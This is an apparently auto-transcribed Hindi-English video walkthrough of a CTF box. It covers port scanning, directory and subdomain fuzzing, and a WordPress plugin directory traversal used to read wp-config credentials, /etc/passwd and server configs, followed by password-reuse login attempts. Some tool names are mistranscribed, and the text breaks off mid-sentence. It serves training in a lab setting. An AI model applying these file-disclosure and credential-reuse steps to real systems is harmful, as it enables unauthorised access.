What's going on YouTube? This is Mr. Web Secure YouTube channel. I am your host and we have a fantastic video. Guys, in this video I am going to reveal CTF walkthrough of Mr. Box medium level which was held on 10 December at Hackoline Security Conference 2023. So let's jump in. सो गाइस मैं यहाँ पर मीडियम बॉक्सेस को सॉल्व करने के लिए पैरट ऑपरेटिंग सिस्टम का यूज कर रहा हूँ। आप काली ऑपरेटिंग सिस्टम का भी यूज कर सकते हैं। सो चलिए सबसे पहले मैं यहाँ पर टर्मिनल ओपन कर लेता हूँ। मेरे पास आईपी एड्रेस है जो आपको हैकोलाइन सिक्योरिटी कॉन्फ्रेंस में दिया गया था। तो चलिए हम यहाँ पर इसको पिंग करके देखते हैं कि ये मेरा नेटवर्क अप है या डाउन है। सो गाइस सीटीएफ का फर्स्ट स्टेप यही होता है कि आप सबसे पहले उस नेटवर्क को पिंग करके देखें कि वहाँ से रिस्पॉन्स आ रहा है या नहीं तो मेरा सारा टाइम वेस्ट हो जाएगा। ओके, तो मैं यहाँ पे आईपी को पेस्ट कर रहा हूँ एंड सक्सेसफुली मुझे पिंग आ रहा है। तो चलिए हम यहाँ पे नेटवर्क को स्कैन करते हैं। तो नेटवर्क को कैसे स्कैन करें उसके लिए मैं यहाँ पे टाइप करता हूँ sudo nmap-sc-sv। उसके बाद मैं इस आईपी एड्रेस को पेस्ट कर रहा हूँ। फिर उसके बाद मैं यहाँ पर -min रेट यानी कि मिनिमम रेट मुझे 1000 करना है। ओके, उसके बाद मैं यहाँ पे इंटर कर दे रहा हूँ। सो गाइस यहाँ पर ये इस आईपी के पूरे पोर्ट्स को स्कैन करेगा। सो गाइस यहाँ पे मेरे पास रिस्पॉन्स आ गया। यहाँ पे 3 पोर्ट्स ओपन है। फर्स्ट जो पोर्ट है वो 22 है जो कि टीसीपी का पोर्ट है और इसका जो स्टेट है ओपन है और इस पर जो सर्विसेज रन कर रही है वो एसएसएच की और इसका जो वर्जन है ओपन एसएसएच 8.2 P1 उबंटू 4 उबंटू 0.9। ओके, एंड इस पर ये होस्ट की रन हो रहा है लाइक RS से ECDS से। जो सेकेंड पोर्ट है वो TCP का है और इस पे Nginx की सर्विसेज रन कर रही है और जिसका वर्जन 1.18 है। उसके बाद ये उबंटू पे बेस्ड है। उसके बाद थर्ड जो है 8080 पोर्ट है जो कि TCP का पोर्ट है और इस पे Apache HTTPD 2.4.41 की सर्विसेज रन कर रही है जो कि बेस्ड है उबंटू पे। सो हमारा फर्स्ट स्टेप क्या होता है? मोस्टली CTF के केसेस में हम 21 को अवॉइड करते हैं। ओके, 21 में बेसिकली फायरवॉल इम्प्लीमेंटेड है। ओके, हम यहाँ पे फर्स्टली हम पोर्ट 80 और 8080 को देखते हैं। तो हम यहाँ पे क्या करते हैं, जो मैंने आईपी को स्कैन किया था उस आईपी को कॉपी करता हूँ। फिर उसके बाद मैं यहाँ पर नए टैब में इसको पेस्ट कर दे रहा हूँ। ओके गाइस, एंड अनदर आईपी को मैं कॉपी करता हूँ और इस टैब में मैं इसको पेस्ट कर दे रहा हूँ। ओके, सो गाइस यहाँ पर पोर्ट 80 की सर्विसेज दिख रही है और यहाँ पे पोर्ट 8080 की सर्विसेज दिख रही है। ओके गाइस, तो हमारा फर्स्ट स्टेप क्या है? किसी भी वेबसाइट का टेक्नोलॉजी फाइंड करना कि वो वेबसाइट एक्चुअल में किस लैंग्वेज में बनी है। ओके, यहाँ पे 2 पोर्ट है। ये वेबसाइट पोर्ट 80 पे रन कर रही है और ये वेबसाइट पोर्ट 8080 पे रन कर रही है। ओके गाइस, एंड अनदर पोर्ट क्या है? वो पोर्ट 22 है जो कि एसएसएच के लिए है। तो एसएसएच हमारे पास कोई क्रेडेंशियल नहीं है तो चांसेस है कि हम यहाँ पे एसएसएच पर लॉगिन नहीं कर पाएंगे क्योंकि बिना क्रेडेंशियल के आप एसएसएच से कैसे लॉगिन करोगे? ब्रूट फोर्स अटैक करना सीटीएफ में वेस्टिंग होता है। ओके, बिना यूज़र नेम पासवर्ड का। तो मेरा फर्स्ट स्टेप क्या रहेगा? सबसे पहले मैं इस पेज का टेक्नोलॉजी फाइंड करूँगा। तो यहाँ पर मैं बाय डिफ़ॉल्ट ही ट्राई कर रहा हूँ index.html और ये मुझे वेबसाइट सक्सेसफुली रिस्पॉन्स कर रही है, वो भी HTML में। ओके, अनदर थिंग मुझे फाइंड करना है कि PHP में बनी है। नहीं, यहाँ पे मुझे PHP में नहीं दिख रहा है। ओके, एरर जनरेट कर रहा है। अगर मैं यहाँ पे ASP टाइप कर रहा हूँ, हो सकता है ASP.NET में हो। ओके, तो यहाँ पे मुझे एरर ही जनरेट कर रहा है। तो मैं ये गेस कर सकता हूँ कि ये जो वेबसाइट है HTML में बनी हुई है और चांसेस है कि HTML स्टैटिक होता है और वहाँ पर ऐसे अटैक सरफेस नहीं होते हैं। तो मैं क्या करता हूँ, बैकग्राउंड में इसका डोमेन स्कैन करता हूँ। ओके, तो उसके लिए मैं यहाँ पे गोबस्टर का यूज़ करता हूँ। उसके बाद dir-URL मैं इसके URL को पेस्ट कर दे रहा हूँ। डोमेन इन द सेंस कि इसके डोमेन के अंदर हिडन फाइल्स एंड फोल्डर्स को स्कैन कर रहा हूँ। तो उसके लिए मैंने गोबस्टर टाइप किया। उसके बाद dir-URL फिर उसके बाद मैंने उसके URL को कॉपी पेस्ट किया। उसके बाद मैं यहाँ पे -w ऑप्ट सेक लिस्ट यानी कि मैं इस वर्ड लिस्ट का यूज़ करूँगा। ये जो वर्ड लिस्ट है आपको इंटरनेट पर ईजिली मिल जाता है। क्यों? क्योंकि ये मोस्ट प्रोफेशनल हैकर्स का टारगेटेड वर्ड लिस्ट है और जितने भी बड़ी हैकिंग होती है मोस्टली यहाँ पे इसी का ही यूज़ किया जाता है। ओके, तो मेरा यहाँ पे थॉट क्या है? हिडन फाइल्स एंड फोल्डर ट्राई करना। ओके, तो इसके लिए मैं यहाँ पे डिस्कवरी ऑप्शन को सिलेक्ट करूँगा। डिस्कवरी के बाद मैं यहाँ पे वेब कंटेंट को सिलेक्ट करूँगा। फिर उसके बाद राफ्ट स्मॉल वर्ड्स, मैं एक स्मॉल वर्ड की वर्ड लिस्ट पिक कर ले रहा हूँ और मैं यहाँ पे स्मॉल वर्ड्स डॉट लोअर्स। ओके गाइस, तो मैंने यहाँ पे क्या किया,
ये वर्ड लिस्ट पिक कर लिया, मैं यहाँ पे इंटर कर दूंगा। तो सो गाइस यहाँ पर इसने डायरेक्टरी स्कैन करना स्टार्ट कर दिया। सबसे पहले इसने फाइंड किया इमेज का फोल्डर है, जेएस का फोल्डर है, वीडियो का फोल्डर है, फॉन्ट, बैट, ये सब फोल्डर्स यहाँ पर देखने को मिल रहे हैं। तो चलिए हम मैनुअली वेबसाइट को रिकॉन करते हैं। ओके, तो सबसे पहले मैं सर्विसेज पे देखता हूँ क्या ऐसा कोई लीकिंग इन्फॉर्मेशन है। मैं यहाँ पे मिस कॉन्फ़िगरेशन की वल्नरेबिलिटी को ट्राई कर रहा हूँ, तो मेरा ये भी वेस्टिंग ना जाए, मैं इस पे भी डायरेक्टरी स्कैन स्टार्ट कर दूँ। एंड गाइस यहाँ पे मेरा डायरेक्टरी स्कैन सक्सेसफुली डन हो गया इस पे। और मेरा अनदर थिंग क्या रहेगा कि मैं गो बस्टर को इसी को कॉपी पेस्ट कर लूँ, फिर उसके बाद पोर्ट 8080 के डायरेक्टरी स्कैन को यहाँ पर परफॉर्म करूँ। तो मैं यहाँ पर क्या कर रहा हूँ, ट्राई कर रहा हूँ 8080। ओके गाइस, अनहिट एंटर कर रहा हूँ। सो गाइस यहाँ पे ये 8080 के डायरेक्टरी को स्कैन कर रहा है। एंड 8080 का टेक्नोलॉजी क्या है अभी हम वो फाइंड करते हैं, लेकिन कभी भी वेस्टिंग टाइम मत करना, बैकग्राउंड में अपनी कुछ ना कुछ सर्विसेज को रन करते रहना। ओके गाइस, तो यहाँ पे मैं और भी जंप कर रहा हूँ, जैसे अवार्ड के सेक्शन पे जा रहा हूँ। यहाँ पे मैं इस कंटेंट को रीड कर रहा हूँ। अच्छा ठीक है, यहाँ पे क्या लिखा है, यहाँ पे अवार्ड्स, उसके बाद यहाँ पे 7 ईयर एक्सपीरियंस ऑफ द ईयर्स, हैक्स, यहाँ पे मोस्टली एम्प्लॉय के नाम भी आप देख सकते हैं, मोस्टली इस पे भी फोकस करना। यहाँ पे डाउन जा रहे हैं धीरे धीरे, क्योंकि ये मोस्टली टेम्पलेट है जो कॉपी पेस्टिंग मुझे लग रहा है। ओके, एंड यहाँ पे फॉर्म का फील्ड है, तो मैं यहाँ पे कुछ भी hack@gmail.com फ़ोन नंबर मैं बाय डिफ़ॉल्ट यहाँ पे कुछ भी मैसेज टाइप करके सेंड करने की कोशिश कर रहा हूँ। एंड यहाँ पे सेंडिंग नहीं हो रहा है, वाई? क्योंकि ये बिकॉज यहाँ पे स्टैटिक वेबसाइट है। ओके गाइस, एंड सबसे लास्ट में हम यहाँ पे देखते हैं कि मोस्टली ये अभी सेंडिंग चल रहा है, लेकिन ये होगा नहीं क्योंकि ये स्टैटिक वेबसाइट है, क्योंकि हमने ऑलरेडी देखा कि ये index.html में बनी हुई वेबसाइट है। ओके गाइस, सो गाइस हम यहाँ पे धीरे धीरे डाउन पर आते हैं। एंड गाइस यहाँ पर हमको दिख रहा है कॉपीराइट का सेक्शन, और इस कॉपीराइट के सेक्शन पे हमको यहाँ पे एक डोमेन लीक हो रहा है, mrwebsecure.ctf। ओके गाइस, तो बिना टाइम वेस्ट किए मैं यहाँ पे इसको sudo nano etc/host में मैं इसको कॉन्फ़िगर कर दे रहा हूँ। तो मेरे सिस्टम की जो IP है, यानी बॉक्स की जो IP है 192.1. तो मैं यहाँ पे 24 टाइप कर रहा हूँ। उसके बाद mrwebsecure.ctf को मैं यहाँ पे टाइप करके इसको ऐड कर दे रहा हूँ। एंड हम यहाँ पे पोर्ट 8080 का स्कैन भी देख लेते हैं। यहाँ पर कोई भी खास स्कैन नहीं है, यहाँ पे डेटाबेस आ रहा है, और ये मैं इस पे ट्राई कर ले रहा हूँ। अभी मैं इस पे जंप करता हूँ, इसकी टेक्नोलॉजी को फाइंड करता हूँ, देखता हूँ यहाँ पे ये कौन सी टेक्नोलॉजी में बना हुआ है। तो मैं यहाँ पे index.html टाइप करता हूँ। एंड गाइस यहाँ पे मुझे मेरे पास आ रहा है कि नॉट फाउंड। ओके गाइस, मैं यहाँ पे PHP टाइप कर रहा हूँ एंड देख रहा हूँ क्या ये PHP पे रिस्पॉन्स आ रहा है। यस गाइस, ये जो वेबसाइट है एक्चुअल में PHP लैंग्वेज में बनी है, और हमने यहाँ पर इसको स्कैन भी कर लिया। तो फास्टली मैं यहाँ पे क्या करता हूँ, इसके फोल्डर, जैसे कि मैं डेटाबेस के फोल्डर में इंटरेस्टेड हूँ, तो मैं यहाँ पे डेटाबेस का फोल्डर यहाँ पे ट्राई कर रहा हूँ। सॉरी, डेटाबेस का फाइल है, ओके, फोल्डर नहीं है। तो यहाँ पे मैं जैसे ही कॉपी पेस्ट कर रहा हूँ और मुझे फॉरबिडन का मैसेज आ रहा है, यानी कि मेरे पास परमिशन नहीं है डेटाबेस को एक्सेस करने की। मे भी हो सकता है कि डेवलपर ने इसको ब्लॉक करके रखा है। फिर डीबी का ऑप्शन है, मैं डीबी को भी ट्राई कर ले रहा हूँ, देखता हूँ क्या ये डीबी को मैं एक्सेस कर पाऊँगा। तो मैंने यहाँ पे डीबी टाइप किया, तो एंड अगेन मेरे पास फॉरबिडन आया, यानी कि मैं ऐसे फोल्डर को एक्सेस नहीं, ऐसे फाइल्स को मैं एक्सेस नहीं कर पा रहा हूँ। इमेजेस है तो मेरे लिए वेस्टिंग होगा, इंक्लूड्स है तो यहाँ पे मोस्टली 403 आ रहे हैं, फॉरबिडन, यानी कि हम क्या कर पा रहे हैं, इसको एक्सेस नहीं कर पाएंगे क्योंकि यहाँ पे मुझे फॉरबिडन का मैसेज आ रहा है। तो मैं यहाँ पे बैकएंड वाला फॉर्म ट्राई कर ले रहा हूँ एंड यहाँ पर भी इसको पेस्ट करता हूँ। एंड गाइस मेरे पास यहाँ पे कुछ रिस्पॉन्स आ रहा है, action.js है, तो यहाँ पे मोस्टली रीड कर ले रहा हूँ मैं कोड को, index.php है। तो यहाँ पे मुझे कुछ भी यहाँ पर ऐसा सेंसिटिव इन्फॉर्मेशन देखने को नहीं मिला। आपको सेंसिटिव इन्फॉर्मेशन को यहाँ पे ट्राई करना, तो मुझे यहाँ पे कोई भी सेंसिटिव इन्फॉर्मेशन नहीं मिला। ओके गाइस, हाँ, फर्स्ट वाले में मैंने एक डोमेन देखा था mrwebsecure.ctf। अभी मैं इस डोमेन को यहाँ पे ओपन करता हूँ, तो उसके लिए मैं यहाँ पे http mrwebsecure.ctf ट्राई कर रहा हूँ। एंड गाइस मुझे वही सेम पेज ओपन हुआ जो कि पोर्ट 80 पर हुआ था, लेकिन गाइस मेरे पास एक डोमेन है। तो गाइस चलिए इसके सब डोमेन को फाइंड करते हैं। तो मैं यहाँ पे इसका मेन डोमेन कॉपी कर लेता हूँ, उसके बाद मैं यहाँ पे टाइप करता हूँ फफ। ओके गाइस,
तो मैं ls करता हूँ, मेरे पास एक फफ का फ़ोल्डर है, मैंने फफ को ऑलरेडी यहाँ पे इंस्टॉल कर लिया है। काले लिनक्स में आपको सिंपल से sudo apt इंस्टॉल फफ करना है, ये इजीली इंस्टॉल हो जाएगा। लेकिन पैरेट ऑपरेटिंग सिस्टम में उसकी ऑफिशियल लाइब्रेरी में फफ स्टोर नहीं है। ओके गाइस, फफ बग हंटर के लिए सबसे इम्पॉर्टेंट टूल होता है। ओके गाइस, तो मैं यहाँ पे क्या टाइप कर रहा हूँ, $/फफ, उसके बाद मैं यहाँ पे -u और URL में मैं इसको पेस्ट कर दे रहा हूँ। लेकिन मैं इस टाइम पर यहाँ पे URL में मैं अपने CTF की मेन IP को टाइप करूँगा। ओके, मेरी जो मेन IP है 1.24 है। उसके बाद मैं यहाँ पे -s टाइप करूँगा यानी होस्ट। तो मैं यहाँ पे होस्ट में मैं मेंशन कर दे रहा हूँ होस्ट, फिर उसके बाद मैं यहाँ पे कॉलन, फिर उसके बाद मैं यहाँ पे fuzz.mrwebsecure.ctf। ओके गाइस, मैं इसको क्लोज कर दे रहा हूँ। अभी ये फजिंग स्टार्ट करेगा इस डोमेन पे। उसके बाद मैं यहाँ पे जो वर्ड लिस्ट यूज़ करूँगा, ऑप्ट सेकलिस्ट का यूज़ करूँगा। जैसा कि मैंने आपको पहले ही बताया कि सेकलिस्ट सबसे बिगेस्ट वर्ड लिस्ट है। तो मुझे यहाँ पे डिस्कवरी करनी है, वो भी DNS की। तो मैं यहाँ पे DNS को सिलेक्ट कर ले रहा हूँ। ओके गाइस, तो मैंने यहाँ पे DNS को सिलेक्ट कर लिया एंड मैं यहाँ पे सब डोमेन को स्कैन करना चाहता हूँ। तो मोस्टली मैं सब डोमेन का लाइक टॉप मिलियन यूज़ करूँगा, टॉप 5000 का। तो मैंने यहाँ पे उसको भी सेलेक्ट कर लिया एंड हिट एंटर कर रहा हूँ। सो गाइस, यहाँ पे स्कैनिंग स्टार्ट हो चुकी है और ये डोमेन को फाइंड कर रहा है। तो इसको फाइंड करने में थोड़ा टाइम लगेगा और यहाँ पे काफ़ी गार्बेज देखने को अपने को मिल रहे हैं। तो मैं यहाँ पे क्या कर रहा हूँ, इसके साइज़ को फ़िल्टर कर रहा हूँ। ओके गाइस, हम यहाँ पे स्टेटस कोड को इसलिए नहीं फ़िल्टर कर रहे हैं क्योंकि मोस्टली सभी का स्टेटस कोड 200 है, लेकिन मैं यहाँ पे साइज़ को फ़िल्टर करके देखता हूँ। ओके गाइस, मैं यहाँ पे FS यानी फ़िल्टर साइज़ में इसको कॉपी पेस्ट कर रहा हूँ एंड एंटर कर रहा हूँ। सो गाइस, यहाँ पर मुझे एक सब डोमेन मिला जो कि सिक्योरिटी का है। ओके गाइस, तो मैं यहाँ पे मेरा सब डोमेन एनुमरेशन सक्सेसफुली डन हो चुका है और मुझे यहाँ पे सिक्योरिटी का एक सब डोमेन मिला। तो मैं इसको भी पॉइंट कर दे रहा हूँ sudo nano etc होस्ट में। होल्ड ऑन 1 सेकेंड, होस्ट। ओके गाइस, तो मैं यहाँ पर इसको भी ऐड कर दे रहा हूँ security.mrwebsecure.ctf। सो गाइस, ये बग हंटिंग का सबसे बेस्ट टूल होता है फफ, और फफ बहुत ज़्यादा पॉपुलर है। अगर आप मिस्टर वेब सिक्योर से 1-to-1 ऑफलाइन कोर्सेज करना चाहते हैं तो नीचे दिए गए नंबर पर आप कॉल कर सकते हैं। यहाँ पर आपको मोबाइल एप्लीकेशन पेनिट्रेशन टेस्टिंग, वेब एप्लीकेशन पेनिट्रेशन टेस्टिंग, नेटवर्क पेनिट्रेशन टेस्टिंग, CTFs के वॉक थ्रू, CTF चैलेंजेस, लिनक्स पेनिट्रेशन टेस्टिंग, लिनक्स में डीप, बेसिक टू एडवांस, API पेनिट्रेशन टेस्टिंग, साइबर सिक्योरिटी बेसिक टू एडवांस के ऊपर डिटेल में कोर्सेज प्रोवाइड की जाती है। ओके, हमसे अभी जुड़ने के लिए नीचे दिए गए नंबर पर आप कॉल कर सकते हैं। ओके गाइस, तो मैं यहाँ पे security.mrwebsecure की वेबसाइट को ओपन कर ले रहा हूँ। तो मैं यहाँ पे टाइप कर रहा हूँ http security.mrwebsecure.ctf। देखता हूँ गाइस यहाँ पर मुझे क्या रिस्पॉन्स आ रहा है। सो गाइस, यहाँ पे मेरे पास एक डिफरेंट वेबसाइट ओपन हुआ एंड मैं ये गेस कर पा रहा हूँ कि ये जो वेबसाइट है वो वर्डप्रेस में बनी है। क्यों? क्योंकि यहाँ पर इसने मेंशन किया है पावर्ड बाय वर्डप्रेस। तो जब कोई भी वेबसाइट वर्डप्रेस में हो तो उसका फर्स्ट स्टेप क्या होता है, WP स्कैन टूल परफॉर्म करना। तो मैं यहाँ पे क्या कर रहा हूँ, WP स्कैन को टाइप करूँगा, WP स्कैन -- URL, मैं इसको पेस्ट कर रहा हूँ। उसके बाद -e यानी कि मैं एनुमरेट करता हूँ यूज़र को। ओके गाइस, तो ये क्या करेगा, यूज़र एनुमरेशन स्टार्ट कर देगा। तो फर्स्टली मैंने यहाँ पे इसके डेटाबेस को अपडेट कर दिया है। ओके, सो यहाँ पे इसका डेटाबेस अपडेट हो चुका है एंड ये स्कैन कर रहा है इस वेबसाइट को बाय डिफ़ॉल्ट। और ये वर्डप्रेस में बना है। थोड़ा सा हम इसके मिसकॉन्फ़िगरेशन को देखते हैं, लेकिन मैं यहाँ पे डायरेक्टली Ctrl+U ट्राई करता हूँ। क्यों? क्योंकि बेसिकली वर्डप्रेस में जो वल्नरेबिलिटी रिलीज होती है मेनली प्लगइन्स की होती है। तो मैं इसके प्लगइन्स को ट्राई कर रहा हूँ। ओके, तो मैं यहाँ पे Ctrl+U ट्राई कर रहा हूँ। तो Ctrl+U जैसे मैंने यहाँ पे प्रेस किया तो मुझे यहाँ पे सोर्स कोड दिखा। ओके गाइस, तो आप यहाँ से इसके प्लगइन्स को स्कैन कर सकते हैं। ओके गाइस, एंड उसके बाद यहाँ पर और भी मेरे पास इन्फॉर्मेशन आ रही है। जैसे मैं और भी जंप कर रहा हूँ 1 by 1। हेडर को इसने स्कैन किया, XML को स्कैन किया और उसके बाद यहाँ पे इसने वर्डप्रेस के वर्जन को स्कैन किया एंड यहाँ पे डायरेक्टरी लिस्टिंग इनेबल है, ग्रीन ग्रास एक। ओके गाइस, एंड यहाँ पे मोस्टली मुझे यहाँ पे केवल यूज़र देखने को मिला लेकिन पासवर्ड नहीं है। तो मैं यहाँ पे क्या एनुमरेट करूँगा, प्लगइन्स को स्कैन करूँगा। तो मैं यहाँ पे क्या टाइप कर रहा हूँ, -- प्लगइन डिटेक्शन
मैं यहाँ पे एग्रेसिव, तो मैंने यहाँ पे टाइप कर दिया प्लगइन डिटेक्शन एग्रेसिव। ये क्या करेगा, पूरे के पूरे प्लगइन्स को स्कैन करेगा। ओके गाइस, तो प्लगइन स्कैन तो इसको करने में काफ़ी टाइम लगेगा, मे बी 5 मिनट या 4 मिनट स्कैन करने में टाइम लगेगा। लेकिन तब तक हम यहाँ पे क्या करते हैं, इसके सोर्स कोड से प्लगइन को फाइंड करते हैं। तो यहाँ पे मैं बेसिकली इसके सोर्स कोड देख रहा हूँ, देखता हूँ यहाँ पे कोई भी प्लगइन की इन्फॉर्मेशन रिवील हो रही है या नहीं। एंड गाइस यहाँ पे मुझे सक्सेसफुली ये प्लगइन्स की इन्फॉर्मेशन रिवील हो चुकी है, जैसे डूका प्रेस समथिंग, ये इसका वर्जन है। तो मैं फास्टली इसका एक्सप्लॉइट सर्च कर रहा हूँ। ओके गाइस, तो यहाँ पे मेरी एक्सप्लॉइट डीबी की वेबसाइट ओपन हो रही है एंड मैं यहाँ पे टाइप कर रहा हूँ डूका प्रेस एंड देखता हूँ क्या इससे रिलेटेड कोई एक्सप्लॉइट है। यस गाइस, यहाँ पे एक वल्नरेबिलिटी है 2.5.2 में, जो कि डायरेक्टरी ट्रावर्सल अटैक की वल्नरेबिलिटी है। ओके, तो मैं यहाँ पे क्या करता हूँ, इस अटैक को यहाँ पे परफॉर्म करता हूँ। तो यहाँ पर इसने मेंशन किए है कि कैसे कैसे इस अटैक को परफॉर्म करना है। ये एक्चुअल में फाइल डिस्क्लोजर, यानी कि आप इसका यूज़ करके सर्वर के इंटरनल फाइल को रीड कर सकते हैं। तो ये मेरा यहाँ पे यूआरएल रहेगा, मैं इसके कंटेंट को यहाँ से कॉपी कर रहा हूँ। उसके बाद मैं यहाँ पे जंप कर रहा हूँ एंड यहाँ पे अगेन पेस्ट कर रहा हूँ। ओके गाइस, मैं इसको रिमूव कर दे रहा हूँ एंड हिट एंटर कर रहा हूँ। देखता हूँ क्या इन्फॉर्मेशन मेरे पास आती है। बेटर यही होगा कि मैं इस इन्फॉर्मेशन को देखने के लिए बॉब शूट का यूज़ करूँ, क्यों, क्योंकि बॉब शूट बहुत बेटर है इसके लिए, फ़ाइल को रीड करने के लिए। मैं यहाँ पे बॉब शूट को इनेबल कर ले रहा हूँ। उसके बाद मैं यहाँ पे मोजिला फायरफॉक्स में अपना फॉक्सी प्रॉक्सी को भी इनेबल कर दे रहा हूँ एंड हिट एंटर कर रहा हूँ। और ये जो रिक्वेस्ट है मेरे सक्सेसफुली बॉब शूट में ट्रांसफ़र हो गई। तो मैं बॉब शूट में विजिट कर रहा हूँ एंड सी गाइस, मैं इसको रिपीटेड टाइम में ट्रांसफ़र कर रहा हूँ। गाइस, अगर आपको नहीं पता कि बॉब शूट का सेटअप कैसे करते हैं, तो आई बटन पर आपको वीडियो मिलेगी, वहाँ पर आप जाके वीडियो को देख सकते हैं। अगर आप मिस्टर वेब सिक्योर से 1-to-1 ऑफलाइन कोर्सेज करना चाहते हैं तो नीचे दिए गए नंबर पर आप अभी कॉल कर सकते हैं। ओके गाइस, तो मैं यहाँ पे इसको सेंड कर रहा हूँ सर्वर के पास एंड बूम, यहाँ पर हमारे पास सर्वर की इंटरनल इन्फॉर्मेशन आ रही है, जैसे कि वहाँ पर उसका WP कॉन्फ़िग की इन्फॉर्मेशन आ रही है, जैसे कि यहाँ पर इसका डेटाबेस का यूज़र है, डेटाबेस का पासवर्ड है। ओके गाइस, और उसके बाद यहाँ पे लोकल होस्ट है। तो मैं यहाँ पे एक बार ट्राई करके देख लेता हूँ कि क्या एक्चुअल में इससे डेटाबेस लॉगिन होता है या नहीं। तो मैं अभी इसको क्लोज़ कर दे रहा हूँ। ओके, क्योंकि ये अभी कोई इसका यूज़ नहीं है। और मैं यहाँ पे क्या कर रहा हूँ, अगेन सिक्योरिटी डॉट मिस्टर वेब सिक्योर की वेबसाइट ओपन कर रहा हूँ एंड मैं यहाँ पे wp-login.php, क्योंकि वर्डप्रेस है तो वर्डप्रेस का जो लॉगिन प्रॉम्प्ट होता है wp-login.php होता है। गाइस, इस वेबसाइट का लॉगिन पेज ओपन हो गया। तो मैं यहाँ पर जैसे मुझे यूज़र नेम मिला था एडमिन एंड पासवर्ड में मैं उसके डेटाबेस का पासवर्ड ट्राई कर ले रहा हूँ, देखता हूँ क्या इससे लॉगिन होगा। ये जो टेक्निक है पासवर्ड रीयूज्ड टेक्निक है और CTF में इसको फॉलो किया जाता है। ओके गाइस, तो मैं इसको कॉपी कर रहा हूँ एंड यहाँ पे आके पेस्ट कर रहा हूँ एंड लॉगिन कर रहा हूँ। तो देखता हूँ एंड मुझे लॉगिन नहीं हुआ, ये मुझे रॉन्ग रिटर्न कर रहा है। तो मे बी इसका पासवर्ड डिफरेंट हो सकता है, मुझे पासवर्ड नहीं पता। तो मैं यहाँ पे क्या करूँगा, मेरा पहला थॉट क्या होगा, ठीक है, यहाँ पे मेरे पास इन्फॉर्मेशन आई। ओके, मैं यहाँ पे लोकल होस्ट यानी डेटाबेस में लॉगिन नहीं कर सकता, क्यों, क्योंकि यहाँ पर इसका जो होस्ट है लोकल होस्ट, यानी कि लोकल होस्ट मेंबर को ही अलाउ है डेटाबेस को लॉगिन करना। अगर यहाँ पे पब्लिक होता तो मैं रिमोटली लॉगिन कर लेता। ओके गाइस, क्योंकि जब हमने Nmap से स्कैन किया तो वहाँ पे 3306 का पोर्ट ओपन नहीं था। अगर वहाँ पे ओपन होता तो मैं एज इट इज़ यहाँ से डेटाबेस को लॉगिन कर लेता। तो मेरा अगला थॉट क्या रहेगा, सिस्टम के इंटरनल इन्फॉर्मेशन को देखना। जैसे मैं /etc passwd की इन्फॉर्मेशन को देखना चाहूँ, etc passwd एंड सेंड कर रहा हूँ। एंड क्या ये मेरे पास सिस्टम की इंटरनल इन्फॉर्मेशन को देगा, जैसे कि passwd। एंड गाइस, यहाँ पे मेरे पास यूज़र्स की इन्फॉर्मेशन आ रही है एंड मोस्टली मैं यहाँ पे ट्राई करूँगा। यहाँ पे जो इसका यूज़र है लेवल 2 है, ओके 1000। तो मैं यहाँ पे एज इट इज़ एक बार ट्राई कर ले रहा हूँ एंड गाइस, यहाँ पे मेरे पास स्कैनिंग का रिज़ल्ट आ गया सक्सेसफुली एंड इसने यहाँ पे स्कैन कर लिया WP स्कैन ने। और यहाँ पर इसने फाइंड किया कि डूका प्रेस का जो प्लगइन्स है यहाँ पे रनिंग पे है और यहाँ पे इसकी इन्फॉर्मेशन आ रही है कि ये वल्नरेबल है। ओके गाइस, तो मेरा अगला थॉट क्या रहेगा कि मैं यहाँ पर एक बार SSH ट्राई कर रहा हूँ
लेवल 2, उसके बाद मैं यहाँ पे 192.168.1.24 और मेरे पास जो पासवर्ड मैंने कॉपी किया था अभी, मैं इसको यहाँ पे इसको पेस्ट कर रहा हूँ एंड देखता हूँ क्या इस पासवर्ड पे लॉगिन हो रहा है या नहीं। एंड गाइस यहाँ पे लॉगिन नहीं हुआ, तो मेरा अभी मुझे नेक्स्ट स्टेप के पास जंप करना है। ओके, मेरा नेक्स्ट स्टेप क्या होगा कि अभी मैं इसके इंटरनल फाइल को रीड कर पा रहा हूँ, तो मेरा अगला थॉट क्या होगा गाइस, हमने स्टार्टिंग में जब नेटवर्क को स्कैन किया था तो वहाँ पे हमारे पास दो पोर्ट थे, लाइक मोस्टली पोर्ट 80 था और 80 था। 80 पे सर्विसेज NGINX की रन कर रही थी और 80 पे अपाची की रन कर रही थी। तो मेरा अगला थॉट क्या रहेगा कि उसके कॉन्फ़िगरेशन को चेक करना। क्यों? क्योंकि बेसिकली जब भी ऐसे सर्विसेज आपको देखने को मिले तो मेरा आप सभी को डाउट आना चाहिए कि ऐसे दो सर्विसेज क्यों, मैं उसके कॉन्फ़िगरेशन को देखना चाहता हूँ। तो मोस्टली जो अपाची का कॉन्फ़िगरेशन होता है वो कैट ETC अपाची 2 के साइट्स अवेलेबल के फ़ोल्डर में होता है। उसके बाद मैं यहाँ पे इसके कॉन्फ़िगरेशन, सबसे पहले मैं इसके डिफ़ॉल्ट कॉन्फ़िगरेशन को देखना चाहूँगा, तो मैं इसको कॉपी कर ले रहा हूँ पूरे के पूरे कंटेंट को और मैं यहाँ पे आके पेस्ट कर रहा हूँ। देखता हूँ क्या इसकी कॉन्फ़िगरेशन है, तो मैं इसको यहाँ पे आके पेस्ट कर रहा हूँ। ओके गाइस, एंड मैं यहाँ पे सेंड कर रहा हूँ अगेन। एंड यहाँ पे मुझे इसके कॉन्फ़िगरेशन की इन्फॉर्मेशन देखने को मिलेगी या नहीं, यहाँ पर देखते हैं हम। सी गाइस, यहाँ पे इसकी कॉन्फ़िगरेशन की इन्फॉर्मेशन आ गई, यानी कि ये जो वेबसाइट थी NGINX की, ओके, ये लोकल होस्ट 8080 पे होस्टेड थी, जिसको रिवर्स प्रॉक्सी किया गया था पोर्ट 80 पे। एंड यहाँ पर जो ये डोमेन था security.mrwebsecure.ctf था और इस पे वर्डप्रेस की वेबसाइट रन हो रही थी, जो कि अभी हमने देखा। लेकिन यहाँ पर अपने पास कोई इन्फॉर्मेशन देखने को नहीं मिला। तो मेरा अगला थॉट क्या होगा, डिफ़ॉल्ट SSL को भी ट्राई करना। यहाँ पर देखते हैं क्या कोई सिक्योरिटी सेंसिटिव इन्फॉर्मेशन हो सकती है। तो मैं यहाँ पे इसको भी पेस्ट कर रहा हूँ एंड यहाँ पे कॉपी पेस्ट किया, मैं एज इट इज़ यहाँ पे जंप कर रहा हूँ, यहाँ पे पेस्ट कर दे रहा हूँ। मैं इसके कॉन्फ़िगरेशन को ट्राई कर रहा हूँ एंड हिट एंटर कर रहा हूँ एंड गाइस मे बी रॉन्ग कॉपी, 